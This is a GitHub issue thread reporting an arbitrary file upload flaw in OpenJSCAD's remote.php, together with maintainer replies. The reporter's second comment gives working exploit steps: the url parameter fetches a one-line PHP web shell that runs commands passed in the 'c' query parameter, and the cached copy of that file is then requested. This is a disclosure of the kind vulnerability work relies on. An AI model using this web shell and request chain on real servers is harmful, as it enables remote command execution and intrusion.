Remote.php has a security issue with arbitrary file uploads

jscad / OpenJSCAD.org

JSCAD is an open source set of modular, browser and command line tools for creating parametric 2D and 3D designs with JavaScript code. It provides a quick, precise and reproducible method for generating 3D models, and is especially useful for 3D printing applications.

https://openjscad.xyz/

MIT License

2.62k stars 511 forks source link

Remote.php has a security issue with arbitrary file uploads #1350

Open Beatriz-ai-boop opened 1 month ago

Beatriz-ai-boop commented 1 month ago

'packages/web/remote.php' Lack of proper validation and sanitization of the $_REQUEST['url'] parameter. Malicious users could inject malicious URLs, leading to remote code execution or other attacks.Using the basename function may also cause path traversal issues.

hrgdavor commented 1 month ago

@Beatriz-ai-boop you need to be more specific and show an example. Taking into account recent uptick in spam CVE reports, and "AI crap" bots doing CVE search you need to provide proof CVE is real and not just assumed.

z3dev commented 1 month ago

Wow! Is @Beatriz-ai-boop trying to be helpful?

the good news is that the PHP remote is not being used.

Beatriz-ai-boop commented 1 month ago

Here are more details.

First download the project.
run mkdir cache on OpenJSCAD.org-master/packages/web/
request http://127.0.0.1:8099/OpenJSCAD.org-master/packages/web/remote.php?url=http://127.0.0.1:8099/shell.php

shell.php is:

<?php echo "<?php \$o=exec(\$_GET['c']);echo \$o;?>"?>

request http://127.0.0.1:8099/OpenJSCAD.org-master/packages/web/cache/240712060740-shell.php?c=whoami

Then you can execute any command based on this php file.

@hrgdavor @z3dev

z3dev commented 1 month ago

@Beatriz-ai-boop Go for it! Please make the fixes!